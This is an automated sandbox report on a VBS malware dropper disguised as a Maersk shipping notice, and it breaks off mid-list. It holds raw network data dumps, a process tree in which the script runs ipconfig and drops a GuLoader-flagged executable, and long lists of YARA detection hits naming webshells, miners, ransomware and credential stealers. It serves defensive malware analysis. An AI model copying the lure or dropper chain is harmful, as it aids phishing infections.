Oct 12, 2021 04:40:11.514764071 CEST	6596	IN	Data Raw: 2c 45 a3 f0 7f d1 49 3b 80 f1 64 fd ff 44 d8 34 0e 63 36 39 c0 97 ad cb df dd b7 ae 9e ab 2e 8f 42 40 3d 75 72 84 45 c6 3c 54 0f db 9e 3c 17 c6 7c 32 74 b3 3c 59 52 ca 59 6d 28 4a 7b 80 74 41 c3 6c 43 c6 28 cf f0 74 f0 97 63 21 81 67 f7 f2 1d 9d Data Ascii: ,EI;dD4c69.B@=urE<T<\|2t<YRYm(J{tAlC(tc!gK50}lH*jv!0y0Cu.d[W99]n"f8`jZXqu'e#v< j'5`(.;SAmh38z[1`PS
Oct 12, 2021 04:40:11.532079935 CEST	6597	IN	Data Raw: 3b 48 61 0d ac 0a c0 44 45 e8 da bb 8c 6b 6e c2 a7 05 5a ef 78 8e 07 42 ff 8f b2 b8 ca a1 5e 5f aa 74 52 35 7f 98 3d 05 b7 7a dc d5 10 23 90 c0 59 a0 62 8d a1 02 04 99 2d c8 6a ea f6 bc b6 61 c5 9d e3 a6 9f 93 5e ea f7 2e 76 5c ff 3e 6d dc 78 e3 Data Ascii: ;HaDEknZxB^_tR5=z#Yb-ja^.v\>mxz<KT'V"E=[2qgv>Pd:]p Fk$BTrGqg$^?DobzVFuuQWYa\|oD?PUHxLQLh>T.cB/
Oct 12, 2021 04:40:11.532145023 CEST	6599	IN	Data Raw: 39 a3 8b 85 e1 78 23 0e db 67 ed 52 4e 8f 59 07 18 3b f7 e8 15 eb 09 e0 8f 03 f0 fa 9f 0d 96 f3 17 fc 19 cf 23 fa 18 af 2b 38 72 59 e6 3b e4 7f 87 f3 5c c6 2f 2d 14 03 04 47 4d 3c cc a7 6d 8a 4b ea 75 ad 05 5e d3 a6 ee 50 3f bb ca 65 f8 4e cc 9a Data Ascii: 9x#gRNY;#+8rY;\/-GM<mKu^P?eNU8N3''(8Ib[}&<4YEZZSX'P8T=+P;IqyO),.FNEFggAYx;Om,V@n%^S
Oct 12, 2021 04:40:11.532191992 CEST	6600	IN	Data Raw: 4f c8 03 0e 4b 1a 22 41 b2 1a e2 bf cc 70 0e 78 cb 8f 2e 0b 95 56 f2 7e 73 e8 a1 48 f1 03 be 45 10 e5 9d 65 5e d6 47 c0 13 ed c1 fd a5 be 07 0d 8e b9 2c e8 fb dd 31 18 95 b1 ff da 2b fa 10 dd 64 75 77 8a 16 24 b6 bc db 2d d4 d5 f6 e6 8a f3 5f b6 Data Ascii: OK"Apx.V~sHEe^G,1+duw$-_#2SIFY=MTS\|+l&]1QKPK7:~vS~hh2hW"AvD Ub_J(1s;VANyuY@yt2FZsq`mdbm\
Oct 12, 2021 04:40:11.532238007 CEST	6601	IN	Data Raw: e6 51 6c fd 4d 9f af c7 34 ba 1b e8 7d 37 57 09 a5 ba 75 ab d2 ed 4a 17 c0 d8 ee 0b c8 10 f5 7e 5f f6 68 2a 51 b8 36 84 55 cc fe 65 6c 9e bf 40 d3 c7 7a 1b 06 36 67 78 1a 54 3c c3 f9 e7 fb d7 19 94 23 01 20 29 4d cf fb ec 98 7a e6 8f 95 86 3b 51 Data Ascii: QlM4}7WuJ~_h*Q6Uel@z6gxT<# )Mz;QL4Fv> J&(/VExC PrrDRM5e(e@88RMBy%xi#Yp38O\|7Y?B1n^N,UDct"LrID,'W8yiJ7\
Oct 12, 2021 04:40:11.532283068 CEST	6603	IN	Data Raw: fb cb be d9 4e 74 22 a6 e4 60 a8 f3 58 16 3b 6e 50 c1 6b 20 0c 85 ea be 23 54 48 0c 87 48 e9 90 5e 7a 06 da ae 58 ba 8a 7e 40 28 b7 ee fc ad a9 65 df 64 75 a6 ac cb d5 c3 bc c3 fd 05 be 8f 48 f4 8f f6 e3 9e 4e 03 8d b8 5f e3 28 66 fc 27 91 4d 36 Data Ascii: Nt"`X;nPk #THH^zX~@(eduHN_(f'M6LP{JV\|<6)P7^,4%JU81f@Xy8Ua;t: BCf[>BF>Rg%r5gB.zc2=)L^fwG0,
Oct 12, 2021 04:40:11.532330036 CEST	6604	IN	Data Raw: 6f 75 79 88 e4 74 f7 8e 39 f4 16 b2 f6 50 6d df a2 cc d1 b3 94 90 c6 9e 08 82 c6 a1 bc f0 a6 4d 6f d7 45 c1 7e 90 da 5c 2e c9 e0 73 a9 cd 53 6c ff ee 5a f2 7e f2 f9 a9 ad 86 b3 c7 de 3e ff 6f 0a e2 23 17 1c ca 5b f6 27 b9 47 f1 6d b2 49 d9 8a 32 Data Ascii: ouyt9PmMoE~\.sSlZ~>o#['GmI2&/>_0\|EU.?D<`^L#l[kFa2o7I=4fH87`3SZ!6Nw6A~8>K,W%6KVrxk\|:Lz
Oct 12, 2021 04:40:11.532380104 CEST	6606	IN	Data Raw: 46 db 40 99 af a3 2b 48 48 29 90 84 43 7d 5a 66 2c 0b 92 15 f3 06 a6 7a f0 cc da b1 5d f9 b3 d3 72 32 0e 77 08 60 a6 95 6c e8 57 fc 77 72 05 b4 4d 3c ca 11 74 a8 50 ad f6 d5 e4 17 df 74 d4 32 5f aa 49 c3 a9 47 82 17 9f 52 e8 91 80 7b b1 53 ae db Data Ascii: F@+HH)C}Zf,z]r2w`lWwrM<tPt2_IGR{S(KVLQmVG$jw{@@_S(<IMY]KnuvY;_'pt1nqG$~TG;0},Pd;xlV,_YtA

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 1848 Parent PID: 4684

General

Start time:	04:39:23
Start date:	12/10/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'
Imagebase:	0x7ff7abec0000
File size:	170496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	moderate

Chronological Activities

Analysis Process: ipconfig.exe PID: 5564 Parent PID: 1848

General

Start time:	04:39:23
Start date:	12/10/2021
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig.exe /release
Imagebase:	0x7ff796060000
File size:	35840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 4460 Parent PID: 5564

General

Start time:	04:39:23
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: AZTEKERNES.exe PID: 3516 Parent PID: 1848

General

Start time:	04:39:27
Start date:	12/10/2021
Path:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Imagebase:	0x400000
File size:	90114 bytes
MD5 hash:	C7778BEEB7B4EE95495E9268EB7DC6A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: ipconfig.exe PID: 312 Parent PID: 1848

General

Start time:	04:39:32
Start date:	12/10/2021
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\ipconfig.exe' /renew
Imagebase:	0x7ff796060000
File size:	35840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 4740 Parent PID: 312

General

Start time:	04:39:32
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 2332 Parent PID: 3516

General

Start time:	04:39:47
Start date:	12/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Imagebase:	0xbf0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mpam-25cd2963.exe PID: 6192 Parent PID: 3224

General

Start time:	04:45:22
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe' /q WD
Imagebase:	0x7ff7202d0000
File size:	16224712 bytes
MD5 hash:	BBC0691332F6E1994993322482AD8480
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: MpSigStub.exe PID: 4180 Parent PID: 6192

General

Start time:	04:45:25
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD
Imagebase:	0x7ff78e7e0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp, Author: Florian Roth Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, Author: Joe Security Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp, Author: FireEye Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Baldr, Description: Yara detected Baldr, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Knot, Description: Yara detected Knot Ransomware, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nephilim, Description: Yara detected Nephilim Ransomware, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security Rule: hacktool_macos_keylogger_logkext, Description: LogKext is an open source keylogger for Mac OS X, a product of FSB software., Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, Author: @mimeframe Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Vidar, Description: Yara detected Vidar stealer, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ByteLocker, Description: Yara detected ByteLocker Ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Artemon, Description: Yara detected Artemon Ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_lazparking, Description: Yara detected LazParking Ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_generic_eval, Description: Generic PHP webshell which uses any eval/exec function in the same line with user input, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: ChinaChopper_Generic, Description: China Chopper Webshells - PHP and ASPX, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_mock, Description: Yara detected Mock Ransomware, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Joe Security Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Oilrig_IntelSecurityManager, Description: Detects OilRig malware, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Eyal Sela Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Winexe_tool, Description: Yara detected Winexe tool, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_gogoogle, Description: Yara detected GoGoogle ransomware, Source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig 